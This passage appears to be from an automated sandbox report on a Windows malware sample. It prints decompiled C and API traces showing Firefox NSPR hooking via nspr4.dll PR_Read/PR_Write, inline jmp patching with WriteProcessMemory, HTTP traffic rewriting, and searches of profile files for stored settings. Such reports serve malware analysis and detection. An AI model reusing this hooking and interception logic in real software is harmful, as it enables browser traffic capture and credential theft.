        • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040EFB2
        • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040EFBF
        • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040EFCC
          • Part of subcall function 0040ECE3: VirtualAllocEx.KERNEL32(000000FF,00000000,00000032,00003000,00000040,00000000,77E49EB0,?,?,0040EF95,0041E020,00000000,0040652B), ref: 0040ED1A
          • Part of subcall function 00418CBA: InitializeCriticalSection.KERNEL32(0042001C,74B04EE0,0040F005,0041E340), ref: 00418CD0
          • Part of subcall function 00418CBA: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00418D0C
          • Part of subcall function 00418CBA: GetProcAddress.KERNEL32(PR_SetError), ref: 00418D1E
          • Part of subcall function 00418CBA: GetProcAddress.KERNEL32(PR_GetError), ref: 00418D30
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$AllocCriticalInitializeSectionVirtual
        • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
        • API String ID: 1833644279-3954199073
        • Opcode ID: 9236722ac28c13b2768b8baccb18989ec6878439a75640a24a6272b099f0bf19
        • Instruction ID: f6857b5433f0791e2361d280183f3b496adb83067569724a36efaa8e8a65353c
        • Opcode Fuzzy Hash: 9236722ac28c13b2768b8baccb18989ec6878439a75640a24a6272b099f0bf19
        • Instruction Fuzzy Hash: 08F0B4B9F41318AAD6202BB7AC05EC2BF68BB85B10308543BBD20A32B0D7B90040DE5C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			E004194A9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				char _v20;
        				signed char _v32;
        				char _v36;
        				char _v40;
        				signed int _v44;
        				void* _v48;
        				signed int _v52;
        				intOrPtr _v60;
        				intOrPtr _v68;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* _t99;
        				signed int _t100;
        				signed int _t101;
        				intOrPtr _t103;
        				void* _t104;
        				signed int _t107;
        				signed int _t108;
        				signed int _t110;
        				intOrPtr _t119;
        				void* _t131;
        				signed int _t139;
        				void* _t149;
        				struct _CRITICAL_SECTION* _t153;
        				intOrPtr _t155;
        				signed int _t168;
        				signed int _t174;
        				char _t176;
        				void* _t177;
        				intOrPtr _t179;
        				void* _t182;
        				signed int _t183;
        				intOrPtr _t186;
        				void* _t188;
        				signed int _t189;
        				void* _t191;
        				void* _t192;
        				void* _t193;
        
        				_t99 = E00406B23();
        				_t179 = _a4;
        				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
        					L40:
        					_t100 =  *0x420040(_t179, _a8, _a12);
        					goto L41;
        				} else {
        					_t153 = 0x42001c;
        					EnterCriticalSection(0x42001c);
        					_t101 = E00418847(_t179);
        					if(_t101 == 0xffffffff) {
        						L39:
        						LeaveCriticalSection(_t153);
        						goto L40;
        					}
        					_t103 = _t101 * 0x38 +  *0x420038;
        					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
        						L32:
        						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
        						_t85 = _t103 + 0x2c; // -4325388
        						_t173 = _t85;
        						__eflags = _a12 - _t182;
        						_t183 =  <  ? _a12 : _t182;
        						_t104 = E00411142(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
        						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
        						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
        						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
        							E004111B9(E00411106( *_t173), _t173, 0, 0xc);
        						}
        						LeaveCriticalSection(_t153);
        						_t100 = _t183;
        						L41:
        						return _t100;
        					}
        					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
        						goto L39;
        					}
        					LeaveCriticalSection(0x42001c);
        					_t107 =  *0x420040(_t179, _a8, _a12);
        					_v52 = _t107;
        					if(_t107 <= 0xffffffff) {
        						L38:
        						_t100 = _v52;
        						goto L41;
        					}
        					EnterCriticalSection(0x42001c);
        					_t108 = E00418847(_t179);
        					_t174 = _t108;
        					if(_t174 == 0xffffffff) {
        						L35:
        						_push(8);
        						_push(0xffffe890);
        						L36:
        						 *0x420018();
        						_v52 = _v52 | 0xffffffff;
        						L37:
        						LeaveCriticalSection(_t153);
        						goto L38;
        					}
        					_t168 = _v52;
        					if(_t168 == 0) {
        						L11:
        						_t176 = _t174 * 0x38 +  *0x420038;
        						_v36 = _t176;
        						if(_t168 > 0) {
        							E00411142( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
        							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
        						}
        						_t110 = E004190CD(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
        						_v52 = _t110;
        						if(_t110 == 1) {
        							_t119 = E00419277( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
        							_v60 = _t119;
        							if(_t119 == 1) {
        								if(E00408A1C( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
        									_t155 = _v40;
        									_t186 = E004110D6( *((intOrPtr*)(_t176 + 0x18)) - _v8 + _v12 + _t155 + 0x14);
        									_v40 = _t186;
        									if(_t186 != 0) {
        										_t131 = E00411142(_t186,  *((intOrPtr*)(_t176 + 0x14)), _v12);
        										_push(_t155);
        										if((_v32 & 0x00000002) == 0) {
        											E004118AF( &_v32);
        											_t188 = E00415E63(_t186, _v16, "Content-Length",  &_v36) + _v60;
        											E00411142(_t188, _v68, _t155);
        											_t189 = _t188 + _t155;
        											__eflags = _t189;
        										} else {
        											_push("%x\r\n");
        											_t191 = _t186 + _t131;
        											_t177 = 0xd;
        											_t192 = _t191 + E00411E3D(_t131, _t177, _t191);
        											E00411142(_t192, _v48, _t155);
        											_t193 = _t192 + _t155;
        											E00411142(_t193, "\r\n0\r\n\r\n", 7);
        											_t176 = _v60;
        											_t189 = _t193 + 7;
        										}
        										_t137 =  *((intOrPtr*)(_t176 + 0x18));
        										if(_v8 !=  *((intOrPtr*)(_t176 + 0x18))) {
        											_t189 = _t189 + E00411142(_t189,  *((intOrPtr*)(_t176 + 0x14)) + _v8, _t137 - _v8);
        										}
        										E00411106( *((intOrPtr*)(_t176 + 0x14)));
        										_t139 = _v44;
        										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
        										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
        									}
        								}
        								_v44 = _v44 | 0xffffffff;
        								E00411106(_v48);
        							}
        							_t153 = 0x42001c;
        						}
        						if(_v52 <= 0) {
        							L29:
        							if(__eflags == 0) {
        								L31:
        								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
        								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
        								 *((intOrPtr*)(_t176 + 0x34)) = 0;
        								 *((intOrPtr*)(_t176 + 0x14)) = 0;
        								 *((intOrPtr*)(_t176 + 0x18)) = 0;
        								E00408EE0( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
        								_t103 = _v40;
        								 *((intOrPtr*)(_t176 + 0x10)) = 0;
        								 *((intOrPtr*)(_t176 + 0xc)) = 0;
        								goto L32;
        							}
        							__eflags = _v44 - 0xffffffff;
        							if(_v44 != 0xffffffff) {
        								goto L37;
        							}
        							goto L31;
        						} else {
        							if(_v44 != 0) {
        								__eflags = _v52;
        								goto L29;
        							}
        							_push(0);
        							_push(0xffffe892);
        							goto L36;
        						}
        					}
        					_t149 = _t108 * 0x38 +  *0x420038;
        					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
        					_t11 = _t149 + 0x14; // -4325412
        					if(E00411091( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
        						goto L35;
        					}
        					_t168 = _v52;
        					goto L11;
        				}
        			}














































        APIs
          • Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B
        • EnterCriticalSection.KERNEL32(0042001C), ref: 004194E5
        • LeaveCriticalSection.KERNEL32(0042001C), ref: 00419513
        • EnterCriticalSection.KERNEL32(0042001C), ref: 00419537
        • LeaveCriticalSection.KERNEL32(0042001C,00000000,?,00000000), ref: 0041977A
        • LeaveCriticalSection.KERNEL32(0042001C), ref: 00419799
          • Part of subcall function 00415E63: StrCmpNIA.SHLWAPI(?,?,?,?,?), ref: 00415EBD
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        • LeaveCriticalSection.KERNEL32(0042001C), ref: 004197A6
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
        • String ID: 0$%x$Content-Length
        • API String ID: 4067213518-3838797520
        • Opcode ID: 4dafdf7f57132eae2b36af7c979d67754611cb37984c35f1f997dfac44d7bfc0
        • Instruction ID: d6463938f9ff925452ade55891b6b4f0f0f21b2fa9480056286d419b04fd3d3f
        • Opcode Fuzzy Hash: 4dafdf7f57132eae2b36af7c979d67754611cb37984c35f1f997dfac44d7bfc0
        • Instruction Fuzzy Hash: 4B91BE72900211EFCB10DF24D841E9ABBB4FF84314F04061AF964976A2D738ED95CBDA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0040ADD9(char* __ecx, char* __edx, void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				intOrPtr _v16;
        				char* _v20;
        				char _v24;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				char _v64;
        				char _v84;
        				char _v108;
        				char _v152;
        				char _v180;
        				char _v252;
        				short _v766;
        				char _v772;
        				short _v1292;
        				void* __edi;
        				void* __esi;
        				void* _t46;
        				void* _t48;
        				void* _t53;
        				void* _t57;
        				void* _t59;
        				void* _t61;
        				void* _t68;
        				void* _t70;
        				void* _t75;
        				WCHAR* _t100;
        				signed int _t101;
        				WCHAR* _t103;
        				char* _t108;
        				intOrPtr _t109;
        				void* _t112;
        				intOrPtr _t125;
        
        				_t99 = __edx;
        				_t98 = __ecx;
        				E004111B9( &_v12,  &_v12, 0, 8);
        				_t46 = 0x6a;
        				E0040CA33(_t46,  &_v252);
        				_t48 = 0x6b;
        				E0040CA33(_t48,  &_v108);
        				_t100 =  &_v772;
        				_t53 = E004150D3(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
        				if(_t53 != 0xffffffff) {
        					_t115 = _t53;
        					if(_t53 != 0) {
        						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
        						E0040ABED(_t99, _t115,  &_v1292,  &_v12);
        						PathRemoveFileSpecW( &_v1292);
        					}
        				}
        				_t101 = 0;
        				if(_v8 != 0) {
        					L14:
        					_t125 = _v8;
        					goto L15;
        				} else {
        					_t57 = 0x6d;
        					E0040CA33(_t57,  &_v64);
        					_t59 = 0x6e;
        					E0040CA33(_t59,  &_v152);
        					_t108 =  &_v84;
        					_t61 = 0x6f;
        					E0040CA33(_t61, _t108);
        					_v24 =  &_v64;
        					_v20 =  &_v152;
        					_v40 = 0x24;
        					_v36 = 0x1a;
        					_v32 = 0x26;
        					_v28 = 0x23;
        					_v16 = _t108;
        					do {
        						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
        						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
        						if(0 == 0) {
        							_t118 = _t109 - 0x24;
        							if(_t109 == 0x24) {
        								E0040ABAB(_t118,  &_v772,  &_v12, 0);
        								_v766 = 0;
        							}
        							_t99 =  &_v24;
        							_t98 =  &_v772;
        							E004165E9( &_v772,  &_v24, 0, 3, 2, E0040AD90,  &_v12, 0, 0, 0);
        						}
        						_t101 = _t101 + 1;
        					} while (_t101 < 4);
        					if(_v8 != 0) {
        						L15:
        						if(_t125 <= 0) {
        							return E00411106(_v12);
        						}
        						_push(0xcb);
        						return E004095BC(_t99, _v12, 0x70);
        					}
        					_t68 = 0x6a;
        					E0040CA33(_t68,  &_v180);
        					_t70 = 0x6c;
        					E0040CA33(_t70,  &_v64);
        					_t103 =  &_v772;
        					_t75 = E004150D3(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
        					if(_t75 != 0xffffffff) {
        						_t124 = _t75;
        						if(_t75 != 0) {
        							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
        							E0040ABAB(_t124,  &_v1292,  &_v12, 1);
        						}
        					}
        					goto L14;
        				}
        			}








































        APIs
          • Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8
        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040AE3F
          • Part of subcall function 0040ABED: GetPrivateProfileStringW.KERNEL32 ref: 0040AC24
          • Part of subcall function 0040ABED: StrStrIW.SHLWAPI(?,?), ref: 0040ACAC
          • Part of subcall function 0040ABED: StrStrIW.SHLWAPI(?,?), ref: 0040ACBD
          • Part of subcall function 0040ABED: GetPrivateProfileStringW.KERNEL32 ref: 0040ACD9
          • Part of subcall function 0040ABED: GetPrivateProfileStringW.KERNEL32 ref: 0040ACF7
        • PathRemoveFileSpecW.SHLWAPI(?,?,00000003,?,00000000), ref: 0040AE5C
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040AED2
        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000), ref: 0040AF6F
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
        • String ID: #$$$&
        • API String ID: 1517737059-1941049543
        • Opcode ID: 3fe7da56c6f8d3e8d56c804d6f45767b58f70885738e988b77ed123a81aeddd5
        • Instruction ID: edf8830f3ae155e624e2b7af056615301be6ae238e1acbd531456aab1855f515
        • Opcode Fuzzy Hash: 3fe7da56c6f8d3e8d56c804d6f45767b58f70885738e988b77ed123a81aeddd5
        • Instruction Fuzzy Hash: 91512CB2E00219AADF10EBA1DC45FDFB7BCAB08314F100567B604F7191DB78AA858B95
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E004156FA(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
        				char _v8;
        				DWORD* _v12;
        				intOrPtr _v47;
        				void _v48;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* __ebp;
        				void* _t48;
        				void* _t59;
        				intOrPtr _t62;
        				void* _t64;
        				intOrPtr* _t67;
        				long _t69;
        				DWORD* _t70;
        				void* _t72;
        
        				_t64 = __edx;
        				_t62 = __ecx;
        				_t59 = __eax;
        				_t70 = 0;
        				_v12 = 0;
        				if(E004156B5(_a4) < 0x1e) {
        					L18:
        					return _v12;
        				}
        				_t3 =  &_v8; // 0x40652b
        				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
        					goto L18;
        				}
        				E004111B9( &_v48,  &_v48, 0xffffff90, 0x23);
        				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
        					L17:
        					_t31 =  &_v8; // 0x40652b
        					_t32 =  &_v8; // 0x40652b
        					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t32, _t31);
        					goto L18;
        				} else {
        					_t67 =  &_v48;
        					_push(0);
        					_push(_t67);
        					while(1) {
        						_t48 = E00419B20(_t59, _t62, _t64, _t67, _t70);
        						if(_t48 == 0xffffffff) {
        							break;
        						}
        						_t70 = _t70 + _t48;
        						if(_t70 > 0x1e) {
        							L16:
        							goto L17;
        						}
        						_t62 =  *_t67;
        						if(_t62 == 0xe9 || _t62 == 0xe8) {
        							if(_t48 == 5) {
        								_t10 =  &_a8; // 0x41e020
        								 *((intOrPtr*)(_t67 + 1)) =  *((intOrPtr*)(_t67 + 1)) + _a4 -  *_t10;
        							}
        						}
        						_push(0);
        						if(_t70 >= 5) {
        							_t16 =  &_a8; // 0x41e020
        							_t17 = _t70 + 5; // 0x5
        							_t69 = _t17;
        							 *((intOrPtr*)(_t72 + _t70 - 0x2b)) = _a4 -  *_t16 - 5;
        							_t21 =  &_a8; // 0x41e020
        							 *((char*)(_t72 + _t70 - 0x2c)) = 0xe9;
        							if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t69, ??) != 0) {
        								_v48 = 0xe9;
        								_v47 = _t59 - _a4 - 5;
        								E0040EC7E(_a4, _a8);
        								if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
        									_v12 = _t69;
        								}
        							}
        							goto L16;
        						}
        						_t67 = _t72 + _t70 - 0x2c;
        						_push(_t67);
        					}
        					goto L16;
        				}
        			}




















        APIs
          • Part of subcall function 004156B5: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,0040EC1E,00000000,00000000,00000032,0040EF95,0041E020,00000000), ref: 004156CA
        • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,+e@,-00000008,00000032,?,?,0040ED3F,?,00000000,?,?,0040EF95,0041E020), ref: 00415727
        • ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,0040ED3F,?,00000000,?,?,0040EF95), ref: 0041574E
        • WriteProcessMemory.KERNEL32(000000FF, A,?,00000005,00000000,?,00000000,00000000,?,?,0040ED3F,?,00000000,?,?,0040EF95), ref: 004157C8
        • WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,0040ED3F,?,00000000,?,?,0040EF95,0041E020,00000000,0040652B), ref: 004157F2
        • VirtualProtectEx.KERNEL32(000000FF,?,0000001E,+e@,+e@,?,?,0040ED3F,?,00000000,?,?,0040EF95,0041E020,00000000,0040652B), ref: 0041580A
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
        • String ID: A$+e@
        • API String ID: 390532180-1592565953
        • Opcode ID: df8b70a94ba76f7af3d9ecf9f1f792a72c095d449639a1daba5e5dd9c3f58b48
        • Instruction ID: 41959f0baa7f229b579e03bce59da075f927d1956974390ca96231d6ecea360f
        • Opcode Fuzzy Hash: df8b70a94ba76f7af3d9ecf9f1f792a72c095d449639a1daba5e5dd9c3f58b48
        • Instruction Fuzzy Hash: 93317236900608EBDF10DFBCCD85EEE7BA9AB49730F508316F935A61D0D674D9818B68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E0040EAE4(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
        				void* __edi;
        				void* _t12;
        				long _t13;
        				void* _t16;
        				void* _t17;
        				void* _t21;
        				void* _t22;
        				void* _t23;
        				UNICODE_STRING* _t24;
        				void* _t28;
        				HMODULE* _t29;
        				struct _OBJDIR_INFORMATION _t31;
        
        				if(E00406B23() != 0) {
        					_t29 = _a16;
        					_t24 = _a12;
        					_t12 =  *0x41e5c4(_a4, 0, _t24, _t29, _t23, _t28, _t17);
        					_t13 = LdrLoadDll(_a4, _a8, _t24, _t29);
        					_a4 = _t13;
        					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
        						EnterCriticalSection(0x41ec44);
        						if(( *0x41ec5c & 0x00000001) == 0) {
        							_t31 =  *_t29;
        							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
        								_t16 = 0;
        							} else {
        								_t16 = E0040EF97(_t21, _t22, _t31);
        							}
        							if(_t16 != 0) {
        								 *0x41ec5c =  *0x41ec5c | 0x00000001;
        							}
        						}
        						LeaveCriticalSection(0x41ec44);
        					}
        					return _a4;
        				}
        				goto ( *0x41e5c0);
        			}
















        APIs
          • Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B
        • LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0040EB07
        • LdrLoadDll.NTDLL(?,?,?,?), ref: 0040EB17
        • EnterCriticalSection.KERNEL32(0041EC44), ref: 0040EB3B
        • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0040EB55
        • LeaveCriticalSection.KERNEL32(0041EC44), ref: 0040EB76
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$EnterHandleLeaveLoadObjectSingleWaitlstrcmpi
        • String ID: @xw$nspr4.dll
        • API String ID: 2984399785-1669710511
        • Opcode ID: 5cbf7ff700ecc311304ec52c169fea240a6263fb1bf503257316d8b3966ca321
        • Instruction ID: 21631a6d6ca1eff474960308faf5c0964e2382f6263bd28ab1c785c413005d9e
        • Opcode Fuzzy Hash: 5cbf7ff700ecc311304ec52c169fea240a6263fb1bf503257316d8b3966ca321
        • Instruction Fuzzy Hash: E011BF35200214ABCB119F539C44F9B7FB8EF49755F14443AFD42B32A1D738A821CE98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00418CBA(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
        				_Unknown_base(*)()* _t12;
        				struct HINSTANCE__* _t14;
        
        				 *0x420038 =  *0x420038 & 0x00000000;
        				 *0x42003c =  *0x42003c & 0x00000000;
        				_t14 = __eax;
        				InitializeCriticalSection(0x42001c);
        				 *0x420034 = _a4;
        				 *0x420010 = _a8;
        				 *0x420040 = _a12;
        				 *0x420014 = _t14;
        				 *0x42000c = _a16;
        				 *0x420008 = GetProcAddress(_t14, "PR_GetNameForIdentity");
        				 *0x420018 = GetProcAddress( *0x420014, "PR_SetError");
        				_t12 = GetProcAddress( *0x420014, "PR_GetError");
        				 *0x420004 = _t12;
        				return _t12;
        			}

        APIs
        • InitializeCriticalSection.KERNEL32(0042001C,74B04EE0,0040F005,0041E340), ref: 00418CD0
        • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00418D0C
        • GetProcAddress.KERNEL32(PR_SetError), ref: 00418D1E
        • GetProcAddress.KERNEL32(PR_GetError), ref: 00418D30
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$CriticalInitializeSection
        • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
        • API String ID: 2804437462-2578621715
        • Opcode ID: f5702b05a45b0b7cdbe2fae046892c1d35f44c9808349889d344981dcf1d5510
        • Instruction ID: b88a209b825abcea9928b83cfd2038a5760dd19bba0caf806aebb136e5417e81
        • Opcode Fuzzy Hash: f5702b05a45b0b7cdbe2fae046892c1d35f44c9808349889d344981dcf1d5510
        • Instruction Fuzzy Hash: 6701EFB5A003149FE730EF24FD48B06BFE0E748361B90883AA548A3262D3789406DF9C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040FE43(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
        				intOrPtr _v16;
        				signed char* _v20;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				intOrPtr _v44;
        				intOrPtr _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				char _v76;
        				char _v104;
        				signed int _v116;
        				signed int _v120;
        				signed int _v124;
        				signed int _v125;
        				char _v128;
        				char _v136;
        				intOrPtr _v172;
        				char _v173;
        				signed int _v176;
        				intOrPtr _v180;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				signed char _t85;
        				signed int _t88;
        				intOrPtr _t89;
        				void* _t92;
        				void* _t96;
        				void* _t100;
        				signed int _t107;
        				intOrPtr _t108;
        				intOrPtr _t111;
        				intOrPtr _t113;
        				intOrPtr _t114;
        				intOrPtr _t115;
        				intOrPtr _t116;
        				intOrPtr _t117;
        				intOrPtr _t118;
        				signed char* _t119;
        				signed int _t120;
        				struct _CRITICAL_SECTION* _t126;
        				intOrPtr _t131;
        				char* _t138;
        				char* _t139;
        				char* _t140;
        				signed int _t142;
        				signed int _t148;
        
        				_v120 = _v120 | 0xffffffff;
        				_t122 =  &_v76;
        				if(E0040FD28( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
        					L23:
        					E00408E76( &_v76);
        					return _v120;
        				}
        				_t85 = E004085D4(_t122);
        				_v120 = _t85;
        				if((1 & _t85) == 0) {
        					__eflags = _t85 & 0x00000002;
        					if((_t85 & 0x00000002) == 0) {
        						_t126 = 0x41ec60;
        						L18:
        						__eflags = _v116 & 0x00000004;
        						if((_v116 & 0x00000004) == 0) {
        							goto L23;
        						}
        						 *_a8 = _v40;
        						 *_a12 = _v36;
        						EnterCriticalSection(_t126);
        						_t146 = _a4;
        						_t88 = E0040F357(_a4);
        						__eflags = _t88 - 0xffffffff;
        						if(_t88 != 0xffffffff) {
        							L21:
        							_t89 =  *0x41ec78; // 0x0
        							_t148 = _t88 * 0x24;
        							__eflags = _t148;
        							E00411106( *((intOrPtr*)(_t148 + _t89 + 8)));
        							_t131 =  *0x41ec78; // 0x0
        							 *((intOrPtr*)(_t148 + _t131 + 8)) = _v44;
        							L22:
        							LeaveCriticalSection(_t126);
        							goto L23;
        						}
        						_t88 = E0040F37D(_t88, _t146);
        						__eflags = _t88 - 0xffffffff;
        						if(_t88 == 0xffffffff) {
        							goto L22;
        						}
        						goto L21;
        					}
        					_v124 = _v124 & 0x00000000;
        					_v125 = 1;
        					__eflags = _v16 - 1;
        					if(_v16 != 1) {
        						L9:
        						_t138 =  &_v104;
        						_t92 = 0x21;
        						E0040C9FD(_t92, _t138);
        						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
        						_t139 =  &_v128;
        						_t96 = 0x22;
        						E0040C9FD(_t96, _t139);
        						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
        						_t140 =  &_v136;
        						_t100 = 0x23;
        						E0040C9FD(_t100, _t140);
        						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
        						L10:
        						_t126 = 0x41ec60;
        						EnterCriticalSection(0x41ec60);
        						__eflags = _v173;
        						if(_v173 == 0) {
        							L14:
        							E00408EE0(_v64, _v68);
        							__eflags = _v176;
        							if(_v176 != 0) {
        								E00412D93(_v172);
        							}
        							L16:
        							LeaveCriticalSection(_t126);
        							goto L18;
        						}
        						_t150 = _a4;
        						_t107 = E0040F357(_a4);
        						__eflags = _t107 - 0xffffffff;
        						if(_t107 != 0xffffffff) {
        							L13:
        							_t108 =  *0x41ec78; // 0x0
        							_t142 = _t107 * 0x24;
        							E00408EE0( *((intOrPtr*)(_t108 + _t142 + 0x10)),  *((intOrPtr*)(_t108 + _t142 + 0xc)));
        							_t111 =  *0x41ec78; // 0x0
        							E00411106( *((intOrPtr*)(_t142 + _t111 + 0x14)));
        							_t113 =  *0x41ec78; // 0x0
        							 *(_t142 + _t113 + 0x14) =  *(_t142 + _t113 + 0x14) & 0x00000000;
        							_t114 =  *0x41ec78; // 0x0
        							 *(_t142 + _t114 + 0x1c) =  *(_t142 + _t114 + 0x1c) & 0x00000000;
        							_t115 =  *0x41ec78; // 0x0
        							 *(_t142 + _t115 + 0x18) =  *(_t142 + _t115 + 0x18) | 0xffffffff;
        							_t116 =  *0x41ec78; // 0x0
        							 *((intOrPtr*)(_t142 + _t116 + 0xc)) = _v76;
        							_t117 =  *0x41ec78; // 0x0
        							 *((intOrPtr*)(_t142 + _t117 + 0x10)) = _v72;
        							_t118 =  *0x41ec78; // 0x0
        							 *((intOrPtr*)(_t142 + _t118 + 0x20)) = _v180;
        							goto L16;
        						}
        						_t107 = E0040F37D(_t107, _t150);
